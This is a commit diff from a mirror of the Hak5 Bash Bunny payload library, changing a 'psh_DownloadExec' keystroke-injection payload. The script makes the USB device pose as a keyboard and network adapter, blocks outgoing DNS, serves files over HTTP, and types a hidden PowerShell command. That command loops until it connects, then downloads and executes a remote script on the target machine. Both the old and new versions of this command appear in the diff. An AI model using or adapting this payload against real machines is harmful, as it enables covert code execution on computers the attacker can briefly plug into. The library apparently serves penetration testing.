hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

cleaned up and extended

Browse Source
This commit is contained in:
Hink
2017-10-11 11:42:03 -05:00
parent c0ab8d3e88
commit 91c7c2276f
6 changed files with 55 additions and 53 deletions
Download Patch File Download Diff File Expand all files Collapse all files

0
payloads/library/execution/psh_DownloadExec/psh.txt → payloads/library/execution/psh_DownloadExec/p.txt
View File

36
payloads/library/execution/psh_DownloadExec/payload.txt
View File

@@ -8,7 +8,8 @@
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.3
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
# ensure p.txt (your powershell payload) exists in payload directory
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
@@ -18,41 +19,38 @@
ATTACKMODE RNDIS_ETHERNET HID
LED SETUP
REQUIRETOOL gohttp
GET HOST_IP
GET SWITCH_POSITION
# Set working dir
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
SERVER_LOG=$PAYLOAD_DIR/server.log
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
SERVER_LOG=/tmp/server.log
# Fresh Server Log
rm -f $SERVER_LOG
# SERVER LOG
rm -f ${SERVER_LOG}
# Check for gohttp
REQUIRETOOL gohttp
# Start web server
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
# Check for psh.txt
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL2
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
# Attack HID
# STAGE 1 - POWERSHELL
LED STAGE1
# Attack (abbreviations to allow run execution)
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
# Remove tracks in the psh payload if you wish
# Attack Ethernet
# STAGE 2 - WAIT
LED STAGE2
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
sleep .5
done

2
payloads/library/execution/psh_DownloadExec/readme.md
View File

@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
## Configuration
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
## Requirements